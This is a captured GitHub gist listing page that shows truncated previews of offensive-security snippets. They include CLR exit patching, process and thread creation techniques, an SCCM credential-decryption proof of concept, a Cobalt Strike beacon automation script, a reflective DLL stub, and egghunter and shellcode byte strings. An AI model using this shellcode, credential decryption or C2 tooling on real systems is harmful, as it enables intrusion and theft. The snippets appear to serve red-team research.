Skip to content

Instantly share code, notes, and snippets.

View yamakadi's full-sized avatar

YK yamakadi

61 followers · 33 following
View GitHub Profile
@odzhan
odzhan / proc_env_exit.cpp
Last active June 12, 2024 05:01
Resolve dynamic address of Process.Environment.Exit in CLR host process using C++
//
// Resolve dynamic address of Process.Environment.Exit in CLR host process using C++
//
// Based on :
// https://www.mdsec.co.uk/2020/08/massaging-your-clr-preventing-environment-exit-in-in-process-net-assemblies/
// https://github.com/yamakadi/clroxide/blob/214222d578bf62b4c7fc860125268f4eecb9f331/examples/patch_exit.rs
// https://github.com/kyleavery/inject-assembly/blob/8db977c0fd1da039df920f9dd4840d4a3ec2aa2c/src/scmain.c
// https://github.com/TheWover/donut/blob/master/loader/test/rdt.cpp ;)
@alfarom256
alfarom256 / Source.cpp
Last active May 4, 2024 18:05
Thread Execution via NtCreateWorkerFactory
#include <Windows.h>
#include <winternl.h>
#include <stdio.h>
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
// https://github.com/winsiderss/systeminformer/blob/17fb2e0048f062a04394c4ccd615b611e6ffd45d/phnt/include/ntexapi.h#LL1096C1-L1115C52
typedef enum _WORKERFACTORYINFOCLASS
{
WorkerFactoryTimeout, // LARGE_INTEGER
@kfosaaen
kfosaaen / AppRegRoleFinder.ps1
Created March 8, 2023 22:57
PowerShell 3-liner to find roles attached to your current user
# Get a token and split out the payload
$token = ((Get-AzAccessToken).Token).Split(".")[1].Replace('-', '+').Replace('_', '/')
# Add padding, if needed
while ($token.Length % 4) {$token += "="}
# Base64 Decode, convert from json, extract OID, pass into filter for Get-AzRoleAssignment to find current roles
Get-AzRoleAssignment | where ObjectId -EQ ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($token)) | ConvertFrom-Json).oid
@rasta-mouse
rasta-mouse / NtCreateUserProcess.cs
Created December 20, 2022 22:19
Attempt at NtCreateUserProcess in C# (not working)
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace CreateProcess;
internal static class Program
{
public static void Main(string[] args)
{
@xpn
xpn / sccmdecryptpoc.cs
Last active June 27, 2024 11:15
SCCM Account Password Decryption POC
// Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;)
// Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work.
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
namespace SCCMDecryptPOC
{
internal class Program
@Flangvik
Flangvik / gist:c31b26129743be699133dc9dab9c02c5
Created February 3, 2022 13:17
NewIpAlert.cna
on heartbeat_15m {
foreach $beacon (beacons()) {
println("[VPN] Running command on id: " . $beacon['id'] . ", hostname:" . binfo($beacon['id'], "computer") . "\n");
$id = $beacon['id'];
bipconfig($id,{
print("[VPN] Captured network interfaces from " . binfo($1, "computer") . ", looking for a new IPs to alert on\n");
exec("python3.7 /<fullpath>/AlertOnNewIp.py --data " . transform($2, "powershell-base64") . " --user " . binfo($1, "user") . " --computer " . binfo($1, "computer"));
});
}
@Cracked5pider
Cracked5pider / ReflectedDll.c
Last active January 20, 2022 14:01
Get output from injected reflected dll
//===============================================================================================//
// This is a stub for the actuall functionality of the DLL.
//===============================================================================================//
#include "ReflectiveLoader.h"
#include <stdio.h>
// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are
// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own
// DllMain and use the LoadRemoteLibraryR() API to inject this DLL.
@YiChenChai
YiChenChai / shellcode.py
Created September 24, 2021 12:06
egghunter = "I\xbe\x08\x94\x1c\x80\x01\x00\x00\x00H\xc7\xc1\x00\x11\x00\x00A\xff\x96\xd8\x0c\x00\x00H\x05\x00\x0f\x00\x00H\x8d\xa8\x00\x01\x00\x00H\x89\xc4H\x83\xecPH\xb92\xbb=\x80\x01\x00\x00\x00A\xff\x16I\x89\xc5H\x89\xc1A\xffV0H\x89\xc6H1\xdbH\x01\xdeL\x89\xe9H\x8d\x15\x02\x00\x00\x00\xeb\rVirtualQuery\x00A\xff\x96\x88\x01\x00\x00H\x89\xf1H\x89\xeaI\xc7\xc0\x00\x01\x00\x00\xff\xd0\x8b]\x18H\x8bu\x00\x8bE \xa9\x00 \x01\x00u\xbd\x8bE(\xa9\x00\x00\x02\x00t\xb3\x8bE$\xa9\x01\x00\x00\x00u\xa9L\x8d\x0c\x1eH\x8b\x06H=\xef\xbe7\x13t\x0bH\x83\xc6\x08L9\xceu\xec\xeb\x8fI\x89\xf1H\x83\xc6\x08H\x89\xf1H\xc7\xc2\x00P\x00\x00I\xc7\xc0@\x00\x00\x00H\x8d\x1d'\xff\xff\xff\xffS\xf8\xff\xe6"
buf = ""
buf += "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
buf += "\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
buf += "\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
buf += "\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
buf += "\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
buf += "\x41\x51\x
@davidfowl
davidfowl / MinimalAPIs.md
Last active June 28, 2024 17:42
Minimal APIs at a glance
@nullenc0de
nullenc0de / apk_relative_links.txt
Created August 13, 2021 00:07